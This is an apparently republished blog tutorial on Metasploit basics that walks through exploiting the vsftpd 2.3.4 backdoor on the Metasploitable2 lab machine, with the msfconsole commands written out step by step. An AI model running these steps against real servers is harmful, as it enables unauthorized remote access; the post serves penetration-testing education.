首页 > 数据库技术 > 详细

Ethical Hacking - GAINING ACCESS(4)

时间:2019-12-25 22:55:15      阅读:91      评论:0      收藏:0      [点我收藏+]

SERVER SIDE ATTACKS - METASPLOIT

Metasploit is an exploit development and execution tool. It can also be used to carry out other penetration testing tasks such as port scans, service identification and post exploitation tasks.

> msfconsole - runs the metasploit console

> help - shows help

> show[something] - something can be exploits, payloads, auxiliaries or options.

> use[something] - use a certain exploit, payload or auxiliary.

> set [option][value] - configure [option] to have a value of [value]

> exploit - runs the current task

 

Target: Metasploitable2

Tool: Zenmap, Metasploit on Kali Linux

 

Scan the target machine, and find the vsftpd. You can find the backdoor on this application.(https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor)

技术分享图片

 

 技术分享图片

 

 Exploit the target machine follow below steps.

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show targets
    ...targets...
msf exploit(vsftpd_234_backdoor) > set TARGET < target-id >
msf exploit(vsftpd_234_backdoor) > show options
    ...show and set options...
msf exploit(vsftpd_234_backdoor) > exploit

技术分享图片

 

 Now exploit the target machine sucessfully.

技术分享图片

 

Ethical Hacking - GAINING ACCESS(4)

原文:https://www.cnblogs.com/keepmoving1113/p/12099086.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!